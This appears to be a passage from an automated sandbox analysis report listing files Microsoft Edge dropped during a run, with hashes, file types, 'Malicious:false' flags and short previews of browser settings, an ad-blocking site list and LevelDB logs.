                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379025969491138","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552373"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                  Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                  MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                  SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                  SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                  SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\eefd66a5-6dcb-4453-90ca-6bc914b8d592.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                  Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                  MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                  SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                  SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                  SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                  MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                  SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                  SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                  SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67632B30-1D54.pma

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 2048.000000, slope 17753217332035315519916605440.000000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                  Entropy (8bit):0.3869389499003691
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:vFvRwtIZ9II74O9WjFxFnqxb7PJTyq0KT7xqg/L0vR5YtcuJg1HF:NRwyR74lfFnqxYSqcaYt3JaH
                                                                                                                                                                                                                  MD5:D2BDAB807273A78622AA5E19AAFE6C18
                                                                                                                                                                                                                  SHA1:DC0C705244EFC3CE47AC114B0A6DF5589973A07B
                                                                                                                                                                                                                  SHA-256:72D24A76CB334C0B8AD6922FD551D31DFCC3BA70D81D2ECDD8A7B8D5C7CA8829
                                                                                                                                                                                                                  SHA-512:B07E33793076D390B4F2520D53B8BCA2A220418689E75BC67A3BF7970EC01F8A6E30C28F014700AC359B419BDAC8D4936295896F0F57A33393AF3F4CF8D92535
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................`..._..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".lukwsq20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K..>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2............... .2.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                  Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                  MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                  SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                  SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                  SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\220abdb9-7ddb-408c-a324-0f230a728988.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9402
                                                                                                                                                                                                                  Entropy (8bit):5.0879422366456035
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFkdAsa0JaFvrE9kurx3G88bV+FiAxU/PrYJ:stFjsa0JCDsr+bGiPw
                                                                                                                                                                                                                  MD5:80C939E415F0E49A405EF90D1BDC3FD0
                                                                                                                                                                                                                  SHA1:157438D74B39B95A87C0ED9CCD3CEB781AF4C81E
                                                                                                                                                                                                                  SHA-256:242C762323C1CAC250BABEBEFAA9DADDC652102AFA3D1FAAD79FF3E1F3EBB6A5
                                                                                                                                                                                                                  SHA-512:23BD36020D0E47E764650F3816D9811188C750EC0F5BE2CE1032908166AE157BFF9FFE81CA8FE40E31A9276E66051FEFDF7FD79A30048B766BA9AEF21442C581
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\28aaf2ee-7fb7-48be-ab7c-96889bd164c7.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40504
                                                                                                                                                                                                                  Entropy (8bit):5.561285576354764
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:W209TQWSi7pLGLhR/W5wA2f4JH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP0ZEbIvs/:WNFQx6chR/WaA2fOHu1jalZEugTgF6K6
                                                                                                                                                                                                                  MD5:4600FBD9544C4A01E65BA9714EB3ADBC
                                                                                                                                                                                                                  SHA1:0EE8A6A4A52CEF66FCDF41858F06C591DBF18BD9
                                                                                                                                                                                                                  SHA-256:96C86631E6247DE642F849A914969506CB16888DB45093D917CEE96112ACDCF2
                                                                                                                                                                                                                  SHA-512:D70D66F20F417368FDF3409B1B5C1244C11300AC3AE04386F9B9DFD08653918548BF681B4F12154D239F43FD9BEEBC8D7CC8A225024C151554801C85EAAF3F3A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379025968289386","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379025968289386","location":5,"ma

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\2f848e18-eff3-49a1-ad3a-4322b03b9919.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                  Entropy (8bit):5.566063713502838
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:W2d9RQWG/W5wA2f4QH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPDbIvsG2rwXe+p0tW:WYzQx/WaA2fFHu1jaaubTO1tW
                                                                                                                                                                                                                  MD5:211A36A5AEB953DB50145EAD4B20FC0F
                                                                                                                                                                                                                  SHA1:11FE33220D8427EFBB7E31E0E401EA667779B745
                                                                                                                                                                                                                  SHA-256:55FB866713106BCB1BF1038C52D279F8D399FA42E92A6EB68439AE434455F605
                                                                                                                                                                                                                  SHA-512:AB90FE82D199CA97E7BD910F554DA374EE24DCE5CD8327D3535248EE3A43514989040BF46D0FDC962D7470E800246A0816E985A732B47C7B8854B5082AA3C7DC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379025968289386","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379025968289386","location":5,"ma

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6af7f0bd-8b70-4696-8d5e-21d622e013ab.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12933
                                                                                                                                                                                                                  Entropy (8bit):5.270997645997849
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:stFJ99QTryDigabatSuyAsa0JaFvrEkL1ikurx3G88bV+FiAj03/PrYJ:stFPGKSu7sa0JCDNL1Ar+bGiw03w
                                                                                                                                                                                                                  MD5:435C7DA94A203A70EB7E489AE825D849
                                                                                                                                                                                                                  SHA1:909BB7EF266BD57DC267B7CF986862E83624309E
                                                                                                                                                                                                                  SHA-256:535700112F6A2EDF807B70667161F2A725E12B724E20A975B23B50949DA76872
                                                                                                                                                                                                                  SHA-512:547B05A72700931164D98EA399411A5ED13A3897A112F5CAADDA27189B74617BFFFCECAAD76AE878BFC470335D186C53406362ED3AB21D29B1F4D3BCEB752A89
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379025969301478","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6bd465c0-a9fe-46d7-b180-69b9b4b2610b.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):313
                                                                                                                                                                                                                  Entropy (8bit):5.230527603691635
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:7PQ/zAxq1N723oH+Tcwtp3hBtB2KLlpPQrWUN+q2PN723oH+Tcwtp3hBWsIFUv:7obAcaYebp3dFLTouvVaYebp3eFUv
                                                                                                                                                                                                                  MD5:665984B7B70E165306672C9B6204E1E1
                                                                                                                                                                                                                  SHA1:CD04A794D776EB1BE4775BF12692BF1E7871C3EB
                                                                                                                                                                                                                  SHA-256:CB707AB1FFE39F434875A3C43CE49D6EAFAEAC90B364C86B17DC24B7B59A3D88
                                                                                                                                                                                                                  SHA-512:FF0C2FC4A539394DBDE4368FD2C3375A520A84807FCA418018834530CBF24529497207C1959D403775910FF65E094FA16FB05CDB87815E4C6649BCC390F3C2E2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:2024/12/18-15:06:15.285 1e18 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/18-15:06:15.313 1e18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):2163821
                                                                                                                                                                                                                  Entropy (8bit):5.222882498107223
